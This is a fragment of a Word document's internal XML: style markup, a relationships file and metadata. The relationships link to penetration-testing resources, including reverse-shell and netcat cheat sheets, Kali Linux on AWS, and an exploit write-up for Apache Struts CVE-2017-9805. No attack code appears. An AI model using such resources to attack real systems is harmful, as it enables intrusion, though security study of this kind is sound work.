  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000838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ntestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-she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ns.org/security-resources/sec560/netcat_cheat_sheet_v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lienvault.com/blogs/security-essentials/configuring-kali-linux-on-amazon-aws-cloud-for-free/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://robwillis.info/2017/09/exploiting-apache-struts-cve-2017-9805/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pen-testing.sans.org/blog/2017/02/02/pen-test-poster-white-board-bash-bashs-built-in-netcat-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12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-02-02T19:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-03T13:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>